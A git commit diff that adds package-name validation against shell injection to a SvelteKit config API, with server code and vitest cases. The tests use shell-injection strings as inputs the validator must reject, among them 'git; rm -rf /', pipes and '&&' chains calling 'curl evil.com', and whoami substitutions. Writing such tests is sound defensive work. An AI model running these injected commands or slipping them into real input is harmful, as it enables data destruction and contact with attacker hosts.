feat(api): add package name validation to prevent shell injection

fullstackjam · fullstackjam · commit da24946f3f8f · 2026-02-15T22:59:44.000+08:00
- Add validatePackages() function with strict character whitelist
- Block shell metacharacters (;|&amp;`$()&lt;&gt;) in package names
- Allow @, /, -, _, . for scoped packages and go modules
- Validate package types (formula, cask, tap, mas, npm, pip, gem, cargo, go)
- Apply validation to POST/PUT /api/configs and snapshot upload
- Add 23 test cases covering injection attempts
diff --git a/src/lib/server/validation.test.ts b/src/lib/server/validation.test.ts
@@ -1,5 +1,10 @@
 import { describe, it, expect } from 'vitest';
-import { validateCustomScript, validateDotfilesRepo, validateReturnTo } from './validation';
+import {
+	validateCustomScript,
+	validateDotfilesRepo,
+	validateReturnTo,
+	validatePackages
+} from './validation';
 
 describe('validateCustomScript', () => {
 	it('should accept null or undefined', () => {
@@ -240,3 +245,202 @@ describe('validateReturnTo', () => {
 		expect(validateReturnTo('/user/my-config')).toBe(true);
 	});
 });
+
+describe('validatePackages', () => {
+	it('should accept null or undefined', () => {
+		expect(validatePackages(null).valid).toBe(true);
+		expect(validatePackages(undefined).valid).toBe(true);
+	});
+
+	it('should accept empty array', () => {
+		expect(validatePackages([]).valid).toBe(true);
+	});
+
+	it('should accept valid packages', () => {
+		const packages = [
+			{ name: 'git', type: 'formula', desc: 'Version control' },
+			{ name: 'visual-studio-code', type: 'cask', desc: 'Code editor' },
+			{ name: '@vue/cli', type: 'npm', desc: 'Vue CLI' }
+		];
+		const result = validatePackages(packages);
+
+		expect(result.valid).toBe(true);
+		expect(result.error).toBeUndefined();
+	});
+
+	it('should accept packages without description', () => {
+		const packages = [
+			{ name: 'git', type: 'formula' },
+			{ name: 'node', type: 'formula' }
+		];
+		const result = validatePackages(packages);
+
+		expect(result.valid).toBe(true);
+	});
+
+	it('should accept scoped npm packages', () => {
+		const packages = [
+			{ name: '@react/core', type: 'npm' },
+			{ name: '@babel/preset-env', type: 'npm' }
+		];
+		const result = validatePackages(packages);
+
+		expect(result.valid).toBe(true);
+	});
+
+	it('should accept packages with slashes (go modules, npm scopes)', () => {
+		const packages = [
+			{ name: 'github.com/user/repo', type: 'go' },
+			{ name: '@org/package', type: 'npm' }
+		];
+		const result = validatePackages(packages);
+
+		expect(result.valid).toBe(true);
+	});
+
+	it('should reject non-array input', () => {
+		const result = validatePackages('not an array' as any);
+
+		expect(result.valid).toBe(false);
+		expect(result.error).toContain('must be an array');
+	});
+
+	it('should reject more than 500 packages', () => {
+		const packages = Array.from({ length: 501 }, (_, i) => ({
+			name: `pkg${i}`,
+			type: 'formula'
+		}));
+		const result = validatePackages(packages);
+
+		expect(result.valid).toBe(false);
+		expect(result.error).toContain('Maximum 500 packages');
+	});
+
+	it('should reject non-object package entries', () => {
+		const packages = ['git', 'node'] as any;
+		const result = validatePackages(packages);
+
+		expect(result.valid).toBe(false);
+		expect(result.error).toContain('must be an object');
+	});
+
+	it('should reject packages without name', () => {
+		const packages = [{ type: 'formula' }] as any;
+		const result = validatePackages(packages);
+
+		expect(result.valid).toBe(false);
+		expect(result.error).toContain('must have a string name');
+	});
+
+	it('should reject packages with non-string name', () => {
+		const packages = [{ name: 123, type: 'formula' }] as any;
+		const result = validatePackages(packages);
+
+		expect(result.valid).toBe(false);
+		expect(result.error).toContain('must have a string name');
+	});
+
+	it('should reject package name longer than 200 characters', () => {
+		const packages = [{ name: 'a'.repeat(201), type: 'formula' }];
+		const result = validatePackages(packages);
+
+		expect(result.valid).toBe(false);
+		expect(result.error).toContain('too long');
+	});
+
+	it('should reject invalid type', () => {
+		const packages = [{ name: 'git', type: 'invalid' }] as any;
+		const result = validatePackages(packages);
+
+		expect(result.valid).toBe(false);
+		expect(result.error).toContain('Invalid package type');
+	});
+
+	it('should reject shell injection via semicolon', () => {
+		const packages = [{ name: 'git; rm -rf /', type: 'formula' }];
+		const result = validatePackages(packages);
+
+		expect(result.valid).toBe(false);
+		expect(result.error).toContain('Invalid package name');
+	});
+
+	it('should reject shell injection via pipe', () => {
+		const packages = [{ name: 'git | curl evil.com', type: 'formula' }];
+		const result = validatePackages(packages);
+
+		expect(result.valid).toBe(false);
+		expect(result.error).toContain('Invalid package name');
+	});
+
+	it('should reject shell injection via backticks', () => {
+		const packages = [{ name: 'git`whoami`', type: 'formula' }];
+		const result = validatePackages(packages);
+
+		expect(result.valid).toBe(false);
+		expect(result.error).toContain('Invalid package name');
+	});
+
+	it('should reject shell injection via dollar sign', () => {
+		const packages = [{ name: 'git$(whoami)', type: 'formula' }];
+		const result = validatePackages(packages);
+
+		expect(result.valid).toBe(false);
+		expect(result.error).toContain('Invalid package name');
+	});
+
+	it('should reject command substitution', () => {
+		const packages = [{ name: 'git && curl evil.com', type: 'formula' }];
+		const result = validatePackages(packages);
+
+		expect(result.valid).toBe(false);
+		expect(result.error).toContain('Invalid package name');
+	});
+
+	it('should reject redirect operators', () => {
+		const packages = [{ name: 'git > /tmp/pwned', type: 'formula' }];
+		const result = validatePackages(packages);
+
+		expect(result.valid).toBe(false);
+		expect(result.error).toContain('Invalid package name');
+	});
+
+	it('should reject newline injection', () => {
+		const packages = [{ name: 'git\ncurl evil.com', type: 'formula' }];
+		const result = validatePackages(packages);
+
+		expect(result.valid).toBe(false);
+		expect(result.error).toContain('Invalid package name');
+	});
+
+	it('should accept all valid package types', () => {
+		const types = ['formula', 'cask', 'tap', 'mas', 'npm', 'pip', 'gem', 'cargo', 'go'];
+		for (const type of types) {
+			const packages = [{ name: 'valid-package', type }];
+			const result = validatePackages(packages);
+
+			expect(result.valid).toBe(true);
+		}
+	});
+
+	it('should reject description longer than 500 characters', () => {
+		const packages = [
+			{
+				name: 'git',
+				type: 'formula',
+				desc: 'a'.repeat(501)
+			}
+		];
+		const result = validatePackages(packages);
+
+		expect(result.valid).toBe(false);
+		expect(result.error).toContain('description');
+	});
+
+	it('should reject non-string description', () => {
+		const packages = [{ name: 'git', type: 'formula', desc: 123 }] as any;
+		const result = validatePackages(packages);
+
+		expect(result.valid).toBe(false);
+		expect(result.error).toContain('description');
+	});
+});
diff --git a/src/lib/server/validation.ts b/src/lib/server/validation.ts
@@ -88,3 +88,74 @@ export function validateReturnTo(path: string | null | undefined): boolean {
 	// Allow path + optional query string with safe characters
 	return /^\/[a-zA-Z0-9\-_/]*(\?[a-zA-Z0-9\-_=&%]*)?$/.test(path);
 }
+
+interface Package {
+	name: string;
+	type: string;
+	desc?: string;
+}
+
+/** Validates packages array: prevents shell injection in package names.
+ *  Package names must match standard package manager formats (alphanumeric, hyphens, underscores, dots, slashes for scoped packages).
+ *  Types must be: formula, cask, tap, mas, npm, pip, gem, cargo, go.
+ *  Maximum 500 packages per config. */
+export function validatePackages(packages: unknown): ValidationResult {
+	if (!packages) {
+		return { valid: true };
+	}
+
+	if (!Array.isArray(packages)) {
+		return { valid: false, error: 'Packages must be an array' };
+	}
+
+	if (packages.length > 500) {
+		return { valid: false, error: 'Maximum 500 packages allowed' };
+	}
+
+	const validTypes = ['formula', 'cask', 'tap', 'mas', 'npm', 'pip', 'gem', 'cargo', 'go'];
+
+	for (let i = 0; i < packages.length; i++) {
+		const pkg = packages[i];
+
+		if (typeof pkg !== 'object' || pkg === null) {
+			return { valid: false, error: `Package at index ${i} must be an object` };
+		}
+
+		const { name, type, desc } = pkg as Package;
+
+		if (!name || typeof name !== 'string') {
+			return { valid: false, error: `Package at index ${i} must have a string name` };
+		}
+
+		if (name.length > 200) {
+			return { valid: false, error: `Package name too long at index ${i}` };
+		}
+
+		if (!/^[@a-zA-Z0-9._\/-]+$/.test(name)) {
+			return {
+				valid: false,
+				error: `Invalid package name at index ${i}: "${name}". Only alphanumeric, hyphens, underscores, dots, @ and / allowed.`
+			};
+		}
+
+		if (!type || typeof type !== 'string') {
+			return { valid: false, error: `Package at index ${i} must have a string type` };
+		}
+
+		if (!validTypes.includes(type)) {
+			return {
+				valid: false,
+				error: `Invalid package type at index ${i}: "${type}". Must be one of: ${validTypes.join(', ')}`
+			};
+		}
+
+		if (desc !== undefined && (typeof desc !== 'string' || desc.length > 500)) {
+			return {
+				valid: false,
+				error: `Package description at index ${i} must be a string (max 500 chars)`
+			};
+		}
+	}
+
+	return { valid: true };
+}
diff --git a/src/routes/api/configs/+server.ts b/src/routes/api/configs/+server.ts
@@ -1,7 +1,7 @@
 import { json } from '@sveltejs/kit';
 import type { RequestHandler } from './$types';
 import { getCurrentUser, slugify, generateId } from '$lib/server/auth';
-import { validateCustomScript, validateDotfilesRepo } from '$lib/server/validation';
+import { validateCustomScript, validateDotfilesRepo, validatePackages } from '$lib/server/validation';
 import { checkRateLimit, getRateLimitKey, RATE_LIMITS } from '$lib/server/rate-limit';
 
 export const GET: RequestHandler = async ({ platform, cookies, request }) => {
@@ -66,6 +66,9 @@ export const POST: RequestHandler = async ({ platform, cookies, request }) => {
 		return json({ error: 'Rate limit exceeded' }, { status: 429, headers: { 'Retry-After': String(Math.ceil(rlW.retryAfter! / 1000)) } });
 	}
 
+	const pv = validatePackages(packages);
+	if (!pv.valid) return json({ error: pv.error }, { status: 400 });
+
 	if (custom_script) {
 		const sv = validateCustomScript(custom_script);
 		if (!sv.valid) return json({ error: sv.error }, { status: 400 });
diff --git a/src/routes/api/configs/[slug]/+server.ts b/src/routes/api/configs/[slug]/+server.ts
@@ -1,7 +1,7 @@
 import { json } from '@sveltejs/kit';
 import type { RequestHandler } from './$types';
 import { getCurrentUser, slugify } from '$lib/server/auth';
-import { validateCustomScript, validateDotfilesRepo } from '$lib/server/validation';
+import { validateCustomScript, validateDotfilesRepo, validatePackages } from '$lib/server/validation';
 import { checkRateLimit, getRateLimitKey, RATE_LIMITS } from '$lib/server/rate-limit';
 
 export const GET: RequestHandler = async ({ platform, cookies, params, request }) => {
@@ -91,6 +91,11 @@ export const PUT: RequestHandler = async ({ platform, cookies, params, request }
 		return json({ error: 'Rate limit exceeded' }, { status: 429, headers: { 'Retry-After': String(Math.ceil(rlW.retryAfter! / 1000)) } });
 	}
 
+	if (packages !== undefined) {
+		const pv = validatePackages(packages);
+		if (!pv.valid) return json({ error: pv.error }, { status: 400 });
+	}
+
 	if (custom_script !== undefined && custom_script !== null && custom_script !== '') {
 		const sv = validateCustomScript(custom_script);
 		if (!sv.valid) return json({ error: sv.error }, { status: 400 });
diff --git a/src/routes/api/configs/from-snapshot/+server.ts b/src/routes/api/configs/from-snapshot/+server.ts
@@ -1,6 +1,7 @@
 import { json } from '@sveltejs/kit';
 import type { RequestHandler } from './$types';
 import { getCurrentUser, slugify, generateId } from '$lib/server/auth';
+import { validatePackages } from '$lib/server/validation';
 import { checkRateLimit, getRateLimitKey, RATE_LIMITS } from '$lib/server/rate-limit';
 
 export const POST: RequestHandler = async ({ platform, cookies, request }) => {
@@ -35,6 +36,9 @@ export const POST: RequestHandler = async ({ platform, cookies, request }) => {
 	const packages = snapshot.catalog_match?.matched || [];
 	const base_preset = snapshot.matched_preset || 'developer';
 
+	const pv = validatePackages(packages);
+	if (!pv.valid) return json({ error: pv.error }, { status: 400 });
+
 	if (config_slug) {
 		const existing = await env.DB.prepare(
 			'SELECT * FROM configs WHERE user_id = ? AND slug = ?'
